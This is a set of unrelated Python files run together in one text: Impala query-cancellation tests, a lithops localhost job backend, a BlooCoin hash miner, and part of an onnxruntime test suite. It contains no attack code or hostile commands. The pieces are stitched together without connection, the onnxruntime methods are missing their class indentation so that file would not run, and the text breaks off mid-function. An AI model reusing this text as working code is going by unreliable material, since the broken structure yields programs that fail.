            ImpalaTestDimension('cancel_delay', *CANCEL_DELAY_IN_SECONDS))
        cls.ImpalaTestMatrix.add_dimension(
            ImpalaTestDimension('wait_action', *WAIT_ACTIONS))
        cls.ImpalaTestMatrix.add_dimension(
            ImpalaTestDimension('fail_rpc_action', *FAIL_RPC_ACTIONS))
        cls.ImpalaTestMatrix.add_dimension(
            ImpalaTestDimension('join_before_close', *JOIN_BEFORE_CLOSE))
        cls.ImpalaTestMatrix.add_dimension(
            ImpalaTestDimension('buffer_pool_limit', 0))
        cls.ImpalaTestMatrix.add_dimension(
            ImpalaTestDimension('cpu_limit_s', *CPU_LIMIT_S))
        # CTAS only makes sense for formats Impala can write, uncompressed.
        cls.ImpalaTestMatrix.add_constraint(
            lambda v: v.get_value('query_type') != 'CTAS' or (
                v.get_value('table_format').file_format in ['text', 'parquet', 'kudu'] and
                v.get_value('table_format').compression_codec == 'none'))
        cls.ImpalaTestMatrix.add_constraint(
            lambda v: v.get_value('exec_option')['batch_size'] == 0)
        # Ignore 'compute stats' queries for the CTAS query type.
        cls.ImpalaTestMatrix.add_constraint(
            lambda v: not (v.get_value('query_type') == 'CTAS' and
                           v.get_value('query').startswith('compute stats')))
        # Ignore CTAS on Kudu if there is no PRIMARY KEY specified.
        cls.ImpalaTestMatrix.add_constraint(
            lambda v: not (v.get_value('query_type') == 'CTAS' and
                           v.get_value('table_format').file_format == 'kudu' and
                           QUERIES[v.get_value('query')] is None))
        # tpch tables are not generated for hbase as the data loading takes a very
        # long time. TODO: Add cancellation tests for hbase.
        cls.ImpalaTestMatrix.add_constraint(
            lambda v: v.get_value('table_format').file_format != 'hbase')
        if cls.exploration_strategy() != 'core':
            # BUG FIX: rebind the module-level constant. The previous bare
            # assignment only created a function-local that was discarded, so
            # non-core runs silently kept iterating once.
            global NUM_CANCELATION_ITERATIONS
            NUM_CANCELATION_ITERATIONS = 3

    def cleanup_test_table(self, table_format):
        """Drop the CTAS target table if a previous run left it behind."""
        self.execute_query("drop table if exists ctas_cancel", table_format=table_format)

    def execute_cancel_test(self, vector):
        """Run the query/cancel iterations described by 'vector'."""
        query = vector.get_value('query')
        query_type = vector.get_value('query_type')
        if query_type == "CTAS":
            self.cleanup_test_table(vector.get_value('table_format'))
            file_format = vector.get_value('table_format').file_format
            if file_format == 'kudu':
                # Py3 fix: dict.has_key() was removed; 'in' works on 2 and 3.
                assert query in QUERIES and QUERIES[query] is not None,\
                    "PRIMARY KEY for query %s not specified" % query
                query = "create table ctas_cancel primary key (%s) "\
                    "partition by hash partitions 3 stored as kudu as %s" %\
                    (QUERIES[query], query)
            else:
                query = "create table ctas_cancel stored as %sfile as %s" %\
                    (file_format, query)
        join_before_close = vector.get_value('join_before_close')
        wait_action = vector.get_value('wait_action')
        fail_rpc_action = vector.get_value('fail_rpc_action')
        # Combine the optional debug actions into one '|'-separated option.
        debug_action = "|".join(filter(None, [wait_action, fail_rpc_action]))
        vector.get_value('exec_option')['debug_action'] = debug_action
        vector.get_value('exec_option')['buffer_pool_limit'] =\
            vector.get_value('buffer_pool_limit')
        vector.get_value('exec_option')['cpu_limit_s'] = vector.get_value('cpu_limit_s')
        # Execute the query multiple times, cancelling it each time.
        for i in range(NUM_CANCELATION_ITERATIONS):  # Py3 fix: xrange -> range
            handle = self.execute_query_async(query, vector.get_value('exec_option'),
                                              table_format=vector.get_value('table_format'))

            def fetch_results():
                # Runs in a helper thread; stash the outcome on the thread
                # object so the main thread can inspect it after join().
                threading.current_thread().fetch_results_error = None
                threading.current_thread().query_profile = None
                try:
                    new_client = self.create_impala_client()
                    new_client.fetch(query, handle)
                except ImpalaBeeswaxException as e:
                    threading.current_thread().fetch_results_error = e
                threading.current_thread().query_profile = \
                    self.impalad_test_service.get_thrift_profile(handle.get_handle().id)

            thread = threading.Thread(target=fetch_results)
            thread.start()
            sleep(vector.get_value('cancel_delay'))
            assert self.client.get_state(handle) != self.client.QUERY_STATES['EXCEPTION']
            cancel_result = self.client.cancel(handle)
            assert cancel_result.status_code == 0,\
                'Unexpected status code from cancel request: %s' % cancel_result
            if join_before_close:
                thread.join()
            close_error = None
            try:
                self.client.close_query(handle)
            except ImpalaBeeswaxException as e:
                close_error = e
            # Before accessing fetch_results_error we need to join the fetch thread
            thread.join()
            # IMPALA-2063 Cancellation tests may generate profile text that is
            # otherwise hard to reproduce for testing mis-formatting.
            profile = thread.query_profile
            if profile:
                # Py3 fix: iteritems() was removed; items() works on 2 and 3.
                for (k, v) in profile.nodes[1].info_strings.items():
                    assert v == v.rstrip(), \
                        "Mis-formatted profile text: %s %s" % (k, v)
                    # "Plan" text may be strangely formatted.
                    assert k == 'Plan' or '\n\n' not in v, \
                        "Mis-formatted profile text: %s %s" % (k, v)
            if thread.fetch_results_error is None:
                # If the fetch rpc didn't result in CANCELLED (and auto-close the
                # query) then the close rpc should have succeeded.
                assert close_error is None
            elif close_error is None:
                # If the close rpc succeeded, then the fetch rpc should have either
                # succeeded, failed with 'Cancelled' or failed with 'Invalid query
                # handle' (if the close rpc occured before the fetch rpc).
                if thread.fetch_results_error is not None:
                    assert 'Cancelled' in str(thread.fetch_results_error) or \
                        ('Invalid query handle' in str(thread.fetch_results_error)
                         and not join_before_close)
            else:
                # If the close rpc encountered an exception, then it must be due to
                # fetch noticing the cancellation and doing the auto-close.
                assert 'Invalid or unknown query handle' in str(close_error)
                assert 'Cancelled' in str(thread.fetch_results_error)
            if query_type == "CTAS":
                self.cleanup_test_table(vector.get_value('table_format'))
        # TODO: Add some additional verification to check to make sure the query
        # was actually canceled.
        # Executing the same query without canceling should work fine. Only do
        # this if the query has a limit or aggregation.
        if not debug_action and ('count' in query or 'limit' in query):
            self.execute_query(query, vector.get_value('exec_option'))

    def teardown_method(self, method):
        # For some reason it takes a little while for the query to get completely
        # torn down when the debug action is WAIT, causing
        # TestValidateMetrics.test_metrics_are_zero to fail. Introducing a small
        # delay allows everything to quiesce.
        # TODO: Figure out a better way to address this
        sleep(1)
class TestCancellationParallel(TestCancellation):
    """Cancellation tests for plain SELECT queries; safe to run in parallel."""

    @classmethod
    def add_test_dimensions(cls):
        super(TestCancellationParallel, cls).add_test_dimensions()
        # CTAS variants are exercised by the serial suite instead.
        cls.ImpalaTestMatrix.add_constraint(
            lambda v: v.get_value('query_type') != 'CTAS')

    def test_cancel_select(self, vector):
        self.execute_cancel_test(vector)
class TestCancellationSerial(TestCancellation):
    """Cancellation tests for CTAS/insert queries, executed serially so that
    the file-handle leak check after each test is meaningful."""

    @classmethod
    def add_test_dimensions(cls):
        super(TestCancellationSerial, cls).add_test_dimensions()
        matrix = cls.ImpalaTestMatrix
        # Only run the insert tests in this suite - they need to be serial to
        # allow us to check for file handle leaks.
        matrix.add_constraint(lambda v: v.get_value('query_type') == 'CTAS')
        # This suite is slow because it executes serially, so restrict params
        # that are not interesting for inserts.
        matrix.add_constraint(lambda v: v.get_value('cpu_limit_s') == CPU_LIMIT_S[0])
        matrix.add_constraint(
            lambda v: v.get_value('join_before_close') == JOIN_BEFORE_CLOSE[0])
        if cls.exploration_strategy() == 'exhaustive':
            # Exhaustive mode: skip only the zero-delay case.
            matrix.add_constraint(
                lambda v: v.get_value('cancel_delay') != CANCEL_DELAY_IN_SECONDS[0])
        else:
            # Only run a single 'cancel_delay' option in core.
            matrix.add_constraint(
                lambda v: v.get_value('cancel_delay') == CANCEL_DELAY_IN_SECONDS[3])

    @pytest.mark.execute_serially
    def test_cancel_insert(self, vector):
        self.execute_cancel_test(vector)
        metric_verifier = MetricVerifier(self.impalad_test_service)
        metric_verifier.verify_no_open_files(timeout=10)
class TestCancellationFullSort(TestCancellation):
    """Cancellation tests for the full (no-limit) ORDER BY query, covering both
    spilling and in-memory sorts via the buffer pool limit dimension."""

    @classmethod
    def add_test_dimensions(cls):
        super(TestCancellationFullSort, cls).add_test_dimensions()
        matrix = cls.ImpalaTestMatrix
        # Override dimensions to only execute the order-by-without-limit query.
        matrix.add_dimension(ImpalaTestDimension('query', SORT_QUERY))
        matrix.add_dimension(ImpalaTestDimension('query_type', 'SELECT'))
        matrix.add_dimension(ImpalaTestDimension('cancel_delay', *SORT_CANCEL_DELAY))
        matrix.add_dimension(
            ImpalaTestDimension('buffer_pool_limit', *SORT_BUFFER_POOL_LIMIT))
        matrix.add_constraint(
            lambda v: v.get_value('fail_rpc_action') == FAIL_RPC_ACTIONS[0])
        # Restrict to uncompressed parquet; the sort itself is format-agnostic.
        matrix.add_constraint(
            lambda v: v.get_value('table_format').file_format == 'parquet'
            and v.get_value('table_format').compression_codec == 'none')

    def test_cancel_sort(self, vector):
        self.execute_cancel_test(vector)
|
localhost.py | #
# (C) Copyright Cloudlab URV 2021
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import shlex
import queue
import signal
import lithops
import logging
import shutil
import threading
import subprocess as sp
from shutil import copyfile
from pathlib import Path
from lithops.constants import RN_LOG_FILE, TEMP, LITHOPS_TEMP_DIR, COMPUTE_CLI_MSG, JOBS_PREFIX
from lithops.utils import is_lithops_worker, is_unix_system
# Module-level logger for the localhost backend.
logger = logging.getLogger(__name__)

# Destination path where the worker runner script is staged.
RUNNER = os.path.join(LITHOPS_TEMP_DIR, 'runner.py')
# Directory of the installed lithops package, copied alongside the runner.
LITHOPS_LOCATION = os.path.dirname(os.path.abspath(lithops.__file__))
class LocalhostHandler:
    """
    A localhostHandler object is used by invokers and other components to access
    underlying localhost backend without exposing the implementation details.
    """

    def __init__(self, localhost_config):
        logger.debug('Creating Localhost compute client')
        self.config = localhost_config
        self.env = {}  # dict to store environments, keyed by runtime name
        self.job_queue = queue.Queue()  # pending (job_payload, job_filename) pairs
        self.job_manager = None  # background thread draining job_queue
        self.should_run = True  # manager-loop flag; cleared by clear()
        msg = COMPUTE_CLI_MSG.format('Localhost compute')
        logger.info("{}".format(msg))

    def init(self):
        """
        Init tasks for localhost
        """
        pass

    def start_manager(self):
        """
        Starts manager thread to keep order in tasks
        """
        def job_manager():
            # Drains the job queue sequentially so local jobs never overlap.
            logger.debug('Staring localhost job manager')
            self.should_run = True
            while self.should_run:
                job_payload, job_filename = self.job_queue.get()
                if job_payload is None and job_filename is None:
                    # (None, None) is the sentinel pushed by clear() to wake us
                    break
                executor_id = job_payload['executor_id']
                job_id = job_payload['job_id']
                runtime_name = job_payload['runtime_name']
                env = self.get_env(runtime_name)
                process = env.run(job_payload, job_filename)
                process.communicate()  # blocks until the process finishes
                logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Execution finished')
                if self.job_queue.empty():
                    # no more work; exit and let invoke() start a fresh manager
                    break
            self.job_manager = None
            logger.debug("Localhost job manager stopped")

        if not self.job_manager:
            self.job_manager = threading.Thread(target=job_manager)
            self.job_manager.start()

    def _get_env_type(self, runtime_name):
        """
        Gets the environment type based on the runtime name
        """
        # a '/' indicates a docker image reference, otherwise local python
        return 'default' if '/' not in runtime_name else 'docker'

    def get_env(self, runtime_name):
        """
        Generates the proper runtime environment based on the runtime name
        """
        if runtime_name not in self.env:
            if '/' not in runtime_name:
                env = DefaultEnv()
            else:
                pull_runtime = self.config.get('pull_runtime', False)
                env = DockerEnv(runtime_name, pull_runtime)
            env.setup()
            # cache so subsequent jobs reuse the prepared environment
            self.env[runtime_name] = env
        return self.env[runtime_name]

    def deploy_runtime(self, runtime_name, *args):
        """
        Extract the runtime metadata and preinstalled modules
        """
        logger.info(f"Extracting preinstalled Python modules from {runtime_name}")
        env = self.get_env(runtime_name)
        runtime_metadata = env.preinstalls()
        return runtime_metadata

    def invoke(self, job_payload):
        """
        Run the job description against the selected environment
        """
        executor_id = job_payload['executor_id']
        job_id = job_payload['job_id']
        runtime_name = job_payload['runtime_name']
        logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Putting job into localhost queue')
        # ensure a manager thread is alive to pick the job up
        self.start_manager()
        env = self.get_env(runtime_name)
        job_filename = env._prepare_job_file(job_payload)
        self.job_queue.put((job_payload, job_filename))

    def get_runtime_key(self, runtime_name, *args):
        """
        Generate the runtime key that identifies the runtime
        """
        env_type = self._get_env_type(runtime_name)
        runtime_key = os.path.join('localhost', env_type, runtime_name.strip("/"))
        return runtime_key

    def get_backend_type(self):
        """
        Wrapper method that returns the type of the backend (Batch or FaaS)
        """
        return 'batch'

    def clean(self, **kwargs):
        """
        Deletes all local runtimes
        """
        pass

    def clear(self, job_keys=None):
        """
        Kills all running jobs processes
        """
        # stop the manager loop and discard any queued-but-unstarted jobs
        self.should_run = False
        while not self.job_queue.empty():
            try:
                self.job_queue.get(False)
            except Exception:
                pass
        # kill the processes of already-started jobs in every environment
        for runtime_name in self.env:
            self.env[runtime_name].stop(job_keys)
        if self.job_manager:
            # wake the manager thread (blocked in queue.get) so it can exit
            self.job_queue.put((None, None))
        self.should_run = True
class BaseEnv():
    """
    Base environment class for shared methods
    """

    def __init__(self, runtime):
        self.runtime = runtime
        self.jobs = {}  # dict to store executed jobs (job_keys) and PIDs

    def _copy_lithops_to_tmp(self):
        # Stage the lithops package and runner script under LITHOPS_TEMP_DIR.
        # Workers already have the runner in place; nothing to do there.
        if is_lithops_worker() and os.path.isfile(RUNNER):
            return
        os.makedirs(LITHOPS_TEMP_DIR, exist_ok=True)
        try:
            # start from a clean copy of the lithops package
            shutil.rmtree(os.path.join(LITHOPS_TEMP_DIR, 'lithops'))
        except FileNotFoundError:
            pass
        shutil.copytree(LITHOPS_LOCATION, os.path.join(LITHOPS_TEMP_DIR, 'lithops'))
        src_handler = os.path.join(LITHOPS_LOCATION, 'localhost', 'runner.py')
        copyfile(src_handler, RUNNER)

    def _prepare_job_file(self, job_payload):
        """
        Creates the job file that contains the job payload to be executed
        """
        job_key = job_payload['job_key']
        storage_bucket = job_payload['config']['lithops']['storage_bucket']
        local_job_dir = os.path.join(LITHOPS_TEMP_DIR, storage_bucket, JOBS_PREFIX)
        docker_job_dir = f'/tmp/lithops/{storage_bucket}/{JOBS_PREFIX}'
        job_file = f'{job_key}-job.json'
        os.makedirs(local_job_dir, exist_ok=True)
        local_job_filename = os.path.join(local_job_dir, job_file)
        with open(local_job_filename, 'w') as jl:
            # default=str keeps non-JSON-serialisable values from aborting the dump
            json.dump(job_payload, jl, default=str)
        if isinstance(self, DockerEnv):
            # inside the container the job dir is mounted under /tmp/lithops
            job_filename = '{}/{}'.format(docker_job_dir, job_file)
        else:
            job_filename = local_job_filename
        return job_filename

    def stop(self, job_keys=None):
        """
        Stops running processes
        """
        def kill_job(job_key):
            # only signal the process if it is still alive (poll() is None)
            if self.jobs[job_key].poll() is None:
                logger.debug(f'Killing job {job_key} with PID {self.jobs[job_key].pid}')
                PID = self.jobs[job_key].pid
                if is_unix_system():
                    # kill the whole process group so child workers die too
                    PGID = os.getpgid(PID)
                    os.killpg(PGID, signal.SIGKILL)
                else:
                    os.kill(PID, signal.SIGTERM)
            del self.jobs[job_key]

        to_delete = job_keys or list(self.jobs.keys())
        for job_key in to_delete:
            try:
                if job_key in self.jobs:
                    kill_job(job_key)
            except Exception:
                # best-effort cleanup: the job may have exited on its own
                pass
class DockerEnv(BaseEnv):
    """
    Execution environment backed by a Docker runtime image.

    Jobs run inside `docker run` containers with the host's temp directory
    bind-mounted on /tmp so the runner can read the job file and write logs.
    """

    def __init__(self, docker_image, pull_runtime):
        logger.debug(f'Starting Docker Environment for {docker_image}')
        super().__init__(runtime=docker_image)
        self.pull_runtime = pull_runtime
        # Run containers as the invoking user/group so files created under the
        # bind-mounted /tmp keep correct ownership (unix only).
        self.uid = os.getuid() if is_unix_system() else None
        # BUG FIX: gid was previously taken from os.getuid(); use os.getgid().
        self.gid = os.getgid() if is_unix_system() else None

    def setup(self):
        """Stage the lithops runner into the temp dir and optionally pull the image."""
        logger.debug('Setting up Docker environment')
        self._copy_lithops_to_tmp()
        if self.pull_runtime:
            logger.debug('Pulling Docker runtime {}'.format(self.runtime))
            sp.run(shlex.split(f'docker pull {self.runtime}'), check=True,
                   stdout=sp.PIPE, universal_newlines=True)

    def preinstalls(self):
        """Run the runner's 'preinstalls' command in a container; return its JSON output."""
        if not os.path.isfile(RUNNER):
            self.setup()
        tmp_path = Path(TEMP).as_posix()
        cmd = 'docker run '
        cmd += f'--user {self.uid}:{self.gid} ' if is_unix_system() else ''
        cmd += f'--rm -v {tmp_path}:/tmp --entrypoint "python3" {self.runtime} /tmp/lithops/runner.py preinstalls'
        process = sp.run(shlex.split(cmd), check=True, stdout=sp.PIPE,
                         universal_newlines=True, start_new_session=True)
        runtime_meta = json.loads(process.stdout.strip())
        return runtime_meta

    def run(self, job_payload, job_filename):
        """
        Launch one job in a container named 'lithops_<job_key>'.
        Returns the Popen handle, which is also tracked in self.jobs.
        """
        executor_id = job_payload['executor_id']
        job_id = job_payload['job_id']
        total_calls = len(job_payload['call_ids'])
        job_key = job_payload['job_key']
        logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Running '
                     f'{total_calls} activations in the localhost worker')
        if not os.path.isfile(RUNNER):
            self.setup()
        tmp_path = Path(TEMP).as_posix()
        cmd = f'docker run --name lithops_{job_key} '
        cmd += f'--user {self.uid}:{self.gid} ' if is_unix_system() else ''
        cmd += f'--rm -v {tmp_path}:/tmp --entrypoint "python3" {self.runtime} /tmp/lithops/runner.py run {job_filename}'
        # Container stdout/stderr are appended to the shared runner log file.
        log = open(RN_LOG_FILE, 'a')
        process = sp.Popen(shlex.split(cmd), stdout=log, stderr=log, start_new_session=True)
        self.jobs[job_key] = process
        return process

    def stop(self, job_keys=None):
        """
        Force-remove the containers of *job_keys* (all tracked jobs when
        None), then let BaseEnv.stop() kill the local processes.
        """
        if job_keys:
            for job_key in job_keys:
                sp.Popen(shlex.split(f'docker rm -f lithops_{job_key}'),
                         stdout=sp.DEVNULL, stderr=sp.DEVNULL)
        else:
            for job_key in self.jobs:
                sp.Popen(shlex.split(f'docker rm -f lithops_{job_key}'),
                         stdout=sp.DEVNULL, stderr=sp.DEVNULL)
        super().stop(job_keys)
class DefaultEnv(BaseEnv):
    """
    Execution environment that runs jobs with the interpreter currently
    executing lithops (sys.executable) instead of a container.
    """

    def __init__(self):
        logger.debug(f'Starting Default Environment for {sys.executable}')
        super().__init__(runtime=sys.executable)

    def setup(self):
        logger.debug('Setting up Default environment')
        self._copy_lithops_to_tmp()

    def preinstalls(self):
        """Run the runner's 'preinstalls' command and return its parsed JSON output."""
        if not os.path.isfile(RUNNER):
            self.setup()
        completed = sp.run([self.runtime, RUNNER, 'preinstalls'], check=True,
                           stdout=sp.PIPE, universal_newlines=True,
                           start_new_session=True)
        return json.loads(completed.stdout.strip())

    def run(self, job_payload, job_filename):
        """
        Launch the runner for one job as a subprocess; returns the Popen
        handle, which is also tracked in self.jobs.
        """
        executor_id = job_payload['executor_id']
        job_id = job_payload['job_id']
        job_key = job_payload['job_key']
        total_calls = len(job_payload['call_ids'])
        logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Running '
                     f'{total_calls} activations in the localhost worker')
        if not os.path.isfile(RUNNER):
            self.setup()
        # Runner stdout/stderr are appended to the shared runner log file.
        log = open(RN_LOG_FILE, 'a')
        proc = sp.Popen([self.runtime, RUNNER, 'run', job_filename],
                        stdout=log, stderr=log, start_new_session=True)
        self.jobs[job_key] = proc
        return proc
|
blc_hash.py | #!/usr/bin/env python
import sys
import threading
import Queue  # Python 2 module; renamed to 'queue' in Python 3
import random
import time
import string
import hashlib
import argparse
import socket
import json
###
# Handles of spawned worker threads (daemonized; reaped via q.join()).
thread_list = []
# Candidate-string alphabet: a-z, A-Z, 0-9 (Python 2 'string' attribute names).
charmap = string.lowercase + string.uppercase + string.digits
wait_to_send = []  # Stuff we've queued but can't send for various reasons.
###
# Command-line interface for the miner.
parser = argparse.ArgumentParser(
    description="Mine your way to riches and glory with BlooCoins. (Maybe)"
)
parser.add_argument(
    "-t", "--threads",
    help="The amount of worker threads",
    type=int,
    default=5
)
parser.add_argument(
    "-q", "--queue",
    help="The queue size to work through",
    type=int,
    default=50
)
parser.add_argument(
    "-u", "--upper-bound",
    help="The upper bound at which we abandon the job (default: %(default)s)",
    type=int,
    # NOTE(review): this default stays a float — argparse applies type= only
    # to values given on the command line, not to defaults.
    default=1.5*(10**6)
)
parser.add_argument(
    "-d", "--difficulty",
    help="The difficulty as reported by the server",
    type=int,
    default=7
)
parser.add_argument(
    "-a", "--address",
    help="An address to send valid hashes to at a BLC server",
    type=str,
    default=None
)
parser.add_argument(
    "--server",
    help=("The BLC server we're sending to."
          " ADDRESS[:PORT] (default: %(default)s)"),
    type=str,
    default="bloocoin.zapto.org"
)
parser.add_argument(
    "--debug",
    help="Spam the terminal with debugging text.",
    action="store_true"
)
args = parser.parse_args()
# Wall-clock start; the elapsed time is printed at the end of the run.
start_time = time.time()
def start_string():
    # Random 5-character seed drawn from [a-zA-Z0-9] for one mining attempt.
    return "".join(random.choice(charmap) for _ in xrange(5))
def send_work(work, num, work_hash):
    """Queue a winning hash and try to flush everything queued to the server.

    Entries that cannot be delivered (connection failure) remain in
    wait_to_send so a later call can retry them.
    """
    data = {
        "cmd": "check",
        "winning_string": work + str(num),
        "winning_hash": work_hash,
        "addr": args.address
    }
    wait_to_send.append(data)
    if args.debug:
        sys.stdout.write("send_work(): " + str(data) + "\n")
        sys.stdout.flush()
    server = {
        "addr": args.server.split(':')[0],
        "port": 3122
    }
    if len(args.server.split(':')) > 1:
        try:
            server['port'] = int(args.server.split(':')[1])
        # BUG FIX: int() raises ValueError (not TypeError) on a bad port string.
        except ValueError as e:
            # Give me an integer you wanker!
            if args.debug:
                # BUG FIX: writing the exception object itself raised TypeError.
                sys.stdout.write(str(e) + "\n")
                sys.stdout.flush()
    if args.debug:
        sys.stdout.write("about to enumerate, brotha; {0}:{1}\n".format(
            server['addr'], server['port']
            )
        )
        sys.stdout.flush()
    # We're looping just incase something screws up,
    # so we don't lose all our hard work.
    # BUG FIX: the old code popped from wait_to_send while enumerating it,
    # which skips every entry after a successful send. Instead, collect the
    # failures and replace the pending list in one go at the end.
    unsent = []
    for i, w in enumerate(wait_to_send):
        if args.debug:
            sys.stdout.write(str(i) + str(w) + "\n")
            sys.stdout.flush()
        # Apparently we can't reuse sockets after we
        # s.close(), so we have to make one each loop. :(
        s = socket.socket()
        try:
            s.connect((server['addr'], server['port']))
        except IOError as e:
            # Connection failed: keep the entry for a retry and move on.
            if args.debug:
                sys.stdout.write(str(e) + "\n")
                sys.stdout.flush()
            unsent.append(w)
            continue
        s.send(json.dumps(w))
        ret = s.recv(1024)
        if ret.strip() == "True":  # Seriously wtf max?
            # Success, do a little dance, I dunno.
            pass
        if args.debug:
            sys.stdout.write("got back: " + ret + "\n")
            sys.stdout.flush()
        s.close()
    # Only the entries that failed to connect remain queued.
    wait_to_send[:] = unsent
# Work queue feeding the miner threads; filled with random start strings below.
q = Queue.Queue()
def worker():
    """Consume start strings from the queue and brute-force nonces for each.

    A nonce wins when sha512(work + nonce) starts with `difficulty` zeros;
    winners are written to a .blc file and optionally sent to the server.
    """
    difficulty = args.difficulty
    nonce = 0
    target = "0" * difficulty
    while True:
        work = q.get()
        nonce = 0
        sys.stdout.write("[{0}] started work".format(work) + "\n")
        sys.stdout.flush()
        # Layered while loops, because... fuck it.
        while True:
            work_hash = hashlib.sha512(work + str(nonce)).hexdigest()
            if work_hash[:difficulty] == target:
                # Winner: persist the proof, report, optionally submit.
                with open(work + str(nonce) + '.blc', 'w') as proof:
                    proof.write(work_hash)
                sys.stdout.write(
                    "[{0}] Hit the jackpot! // {0}{1} -> {2}".format(
                        work, nonce, work_hash
                    ) + "\n"
                )
                sys.stdout.flush()
                if args.address:
                    send_work(work, nonce, work_hash)
                break
            nonce += 1
            if nonce >= args.upper_bound:
                # Give up on this start string; too many attempts.
                if args.debug:
                    sys.stdout.write(
                        "[{0}] hit upper bound: {1}".format(work, nonce) + "\n"
                    )
                sys.stdout.write("[{0}] no success".format(work) + "\n")
                sys.stdout.flush()
                break
        q.task_done()
# Spin up the worker pool; daemon threads die with the main thread.
for i in range(args.threads):
    t = threading.Thread(target=worker)
    thread_list.append(t)
    t.daemon = True
    t.start()
# Seed the queue with random start strings and block until all are processed.
for i in range(0, args.queue):
    q.put(start_string())
q.join()
finish_time = time.time()
print "Finished in:", finish_time - start_time, "-", "TADA!"
|
onnxruntime_test_python.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
from onnxruntime.capi.onnxruntime_pybind11_state import Fail
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
    """Run mul_1 through *session_object* and check the elementwise square."""
    x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
    feed = {session_object.get_inputs()[0].name: x}
    outputs = session_object.run([], feed, run_options=run_options)
    expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
    np.testing.assert_allclose(expected, outputs[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
    """Serializing an optimized model writes optimized_model_filepath to disk."""
    try:
        so = onnxrt.SessionOptions()
        so.log_verbosity_level = 1
        so.logid = "TestModelSerialization"
        so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
        onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
        self.assertTrue(os.path.isfile(so.optimized_model_filepath))
    except Fail as onnxruntime_error:
        # Tolerated failure: EPs that generate compiled nodes cannot serialize.
        if str(onnxruntime_error) == "[ONNXRuntimeError] : 1 : FAIL : Unable to serialize model as it contains" \
                " compiled nodes. Please disable any execution providers which generate compiled nodes.":
            pass
        else:
            raise onnxruntime_error
def testGetProviders(self):
    """CPU EP is always available, always registered, and lowest in priority."""
    self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
    # get_all_providers() returns the default EP order from highest to lowest.
    # CPUExecutionProvider should always be last.
    self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
    sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
    self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
    """Toggling telemetry events off and on must not raise."""
    onnxrt.disable_telemetry_events()
    # no-op on non-Windows builds
    # may be no-op on certain Windows builds based on build configuration
    onnxrt.enable_telemetry_events()
def testSetProviders(self):
    """set_providers() replaces the registered EP list (CUDA -> CPU only)."""
    if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
        sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
        # confirm that CUDA Provider is in list of registered providers.
        self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
        # reset the session and register only CPU Provider.
        sess.set_providers(['CPUExecutionProvider'])
        # confirm only CPU Provider is registered now.
        self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
    """
    Exercise CUDA EP provider options (device_id, gpu_mem_limit,
    arena_extend_strategy, ...) including rejection of invalid values.
    Effectively a no-op when the CUDA EP is not available.
    """
    if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
        import sys
        import ctypes
        CUDA_SUCCESS = 0

        def runBaseTest1():
            # device_id can be set; a negative id must be rejected.
            sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
            self.assertTrue('CUDAExecutionProvider' in sess.get_providers())

            option1 = {'device_id': 0}
            sess.set_providers(['CUDAExecutionProvider'], [option1])
            self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())

            option2 = {'device_id': -1}
            with self.assertRaises(RuntimeError):
                sess.set_providers(['CUDAExecutionProvider'], [option2])

            sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
            self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())

        def runBaseTest2():
            sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
            self.assertIn('CUDAExecutionProvider', sess.get_providers())

            # test get/set of "gpu_mem_limit" configuration.
            options = sess.get_provider_options()
            self.assertIn('CUDAExecutionProvider', options)
            option = options['CUDAExecutionProvider']
            self.assertIn('gpu_mem_limit', option)
            ori_mem_limit = option['gpu_mem_limit']
            new_mem_limit = int(ori_mem_limit) // 2
            option['gpu_mem_limit'] = new_mem_limit
            sess.set_providers(['CUDAExecutionProvider'], [option])
            options = sess.get_provider_options()
            self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], str(new_mem_limit))

            option['gpu_mem_limit'] = ori_mem_limit
            sess.set_providers(['CUDAExecutionProvider'], [option])
            options = sess.get_provider_options()
            self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], ori_mem_limit)

            def test_get_and_set_option_with_values(option_name, option_values):
                # Round-trip each candidate value through set_providers and
                # verify it is reported back (stringified) by the session.
                provider_options = sess.get_provider_options()
                self.assertIn('CUDAExecutionProvider', provider_options)
                # BUG FIX: read from the freshly fetched provider_options, not
                # the stale outer-scope 'options' dict.
                cuda_options = provider_options['CUDAExecutionProvider']
                self.assertIn(option_name, cuda_options)
                for option_value in option_values:
                    cuda_options[option_name] = option_value
                    sess.set_providers(['CUDAExecutionProvider'], [cuda_options])
                    new_provider_options = sess.get_provider_options()
                    self.assertEqual(
                        new_provider_options.get('CUDAExecutionProvider', {}).get(option_name),
                        str(option_value))

